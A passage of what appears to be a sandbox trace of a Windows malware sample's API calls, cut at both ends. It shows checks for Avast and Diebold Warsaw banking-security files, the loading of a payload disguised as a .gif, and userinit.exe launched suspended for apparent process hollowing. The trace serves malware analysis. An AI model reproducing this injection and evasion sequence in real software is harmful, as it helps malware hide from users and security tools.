[135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0239.573] ResumeThread (hThread=0x160) returned 0x1
[0239.573] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0239.573] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.573] GlobalUnlock (hMem=0x95000c) returned 0
[0239.573] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0239.573] GlobalUnlock (hMem=0x950004) returned 0
[0239.581] Sleep (dwMilliseconds=0xe74e)
[0249.593] VirtualFree (lpAddress=0x1dc0000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0249.594] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0249.594] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0249.594] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0249.594] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0249.594] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168
[0249.594] SetFilePointer (in: hFile=0x168, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0249.594] SetFilePointer (in: hFile=0x168, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0249.594] SetFilePointer (in: hFile=0x168, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0249.595] SetFilePointer (in: hFile=0x168, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0249.597] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0249.597] ReadFile (in: hFile=0x168, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0249.603] CloseHandle (hObject=0x168) returned 1
[0249.604] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.605] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.605] GlobalUnlock (hMem=0x95000c) returned 0
[0249.605] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0249.605] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.606] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.606] GlobalUnlock (hMem=0x95000c) returned 0
[0249.606] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0249.606] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0249.607] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0249.607] GlobalUnlock (hMem=0x95000c) returned 0
[0249.607] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0249.608] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0249.609] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0249.609] GlobalUnlock (hMem=0x95000c) returned 0
[0249.609] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0249.609] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0249.610] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0249.610] GlobalUnlock (hMem=0x95000c) returned 0
[0249.610] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0249.610] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0249.611] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0249.611] GlobalUnlock (hMem=0x95000c) returned 0
[0249.611] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0249.612] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.613] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.613] GlobalUnlock (hMem=0x95000c) returned 0
[0249.613] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0249.614] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.615] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.615] GlobalUnlock (hMem=0x95000c) returned 0
[0249.615] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0249.615] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.616] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.616] GlobalUnlock (hMem=0x95000c) returned 0
[0249.616] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0249.616] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.617] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.617] GlobalUnlock (hMem=0x95000c) returned 0
[0249.617] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0249.617] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.617] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.618] GlobalUnlock (hMem=0x95000c) returned 0
[0249.618] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0249.618] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.619] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.619] GlobalUnlock (hMem=0x95000c) returned 0
[0249.619] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0249.619] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.620] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.620] GlobalUnlock (hMem=0x95000c) returned 0
[0249.620] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0249.620] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.621] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.621] GlobalUnlock (hMem=0x95000c) returned 0
[0249.621] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0249.621] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.622] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.622] GlobalUnlock (hMem=0x95000c) returned 0
[0249.622] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0249.622] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.623] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.623] GlobalUnlock (hMem=0x95000c) returned 0
[0249.623] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0249.624] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0249.625] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0249.625] GlobalUnlock (hMem=0x95000c) returned 0
[0249.625] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0249.625] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0249.626] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0249.626] GlobalUnlock (hMem=0x95000c) returned 0
[0249.626] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0249.628] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0249.629] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0249.629] GlobalUnlock (hMem=0x95000c) returned 0
[0249.629] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0249.629] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.630] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.630] GlobalUnlock (hMem=0x95000c) returned 0
[0249.630] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0249.630] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.631] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.631] GlobalUnlock (hMem=0x95000c) returned 0
[0249.631] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0249.631] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.632] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.632] GlobalUnlock (hMem=0x95000c) returned 0
[0249.632] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0249.632] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.633] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.633] GlobalUnlock (hMem=0x95000c) returned 0
[0249.633] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0249.633] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.634] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.634] GlobalUnlock (hMem=0x95000c) returned 0
[0249.634] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0249.634] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.635] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.635] GlobalUnlock (hMem=0x95000c) returned 0
[0249.635] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0249.635] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.636] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.636] GlobalUnlock (hMem=0x95000c) returned 0
[0249.636] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0249.636] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.637] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.637] GlobalUnlock (hMem=0x95000c) returned 0
[0249.637] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0249.637] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.638] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.638] GlobalUnlock (hMem=0x95000c) returned 0
[0249.638] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0249.638] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.639] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.639] GlobalUnlock (hMem=0x95000c) returned 0
[0249.639] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0249.639] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.639] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.640] GlobalUnlock (hMem=0x95000c) returned 0
[0249.640] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0249.640] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.641] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.641] GlobalUnlock (hMem=0x95000c) returned 0
[0249.641] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0249.641] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.642] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.642] GlobalUnlock (hMem=0x95000c) returned 0
[0249.642] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0249.642] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.643] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.643] GlobalUnlock (hMem=0x95000c) returned 0
[0249.643] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0249.643] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.644] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.644] GlobalUnlock (hMem=0x95000c) returned 0
[0249.644] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0249.644] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.645] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.645] GlobalUnlock (hMem=0x95000c) returned 0
[0249.645] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0249.645] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.646] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.646] GlobalUnlock (hMem=0x95000c) returned 0
[0249.646] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0249.646] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.647] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.647] GlobalUnlock (hMem=0x95000c) returned 0
[0249.647] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0249.647] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.648] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.648] GlobalUnlock (hMem=0x95000c) returned 0
[0249.648] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0249.648] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.649] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.649] GlobalUnlock (hMem=0x95000c) returned 0
[0249.649] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0249.649] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.650] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.650] GlobalUnlock (hMem=0x95000c) returned 0
[0249.650] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0249.650] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.650] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.650] GlobalUnlock (hMem=0x95000c) returned 0
[0249.651] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0249.651] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.651] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.651] GlobalUnlock (hMem=0x95000c) returned 0
[0249.651] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0249.651] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.652] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.652] GlobalUnlock (hMem=0x95000c) returned 0
[0249.652] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0249.652] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.653] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.653] GlobalUnlock (hMem=0x95000c) returned 0
[0249.653] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0249.653] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.654] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.654] GlobalUnlock (hMem=0x95000c) returned 0
[0249.654] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0249.654] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.655] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.655] GlobalUnlock (hMem=0x95000c) returned 0
[0249.655] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0249.655] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0249.656] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x164, hThread=0x168, dwProcessId=0xae8, dwThreadId=0xafc)) returned 1
[0249.659] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0249.659] GetThreadContext (in: hThread=0x168, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd9000, Edx=0x0, Ecx=0x0, Eax=0xa72be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x18f8b0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, 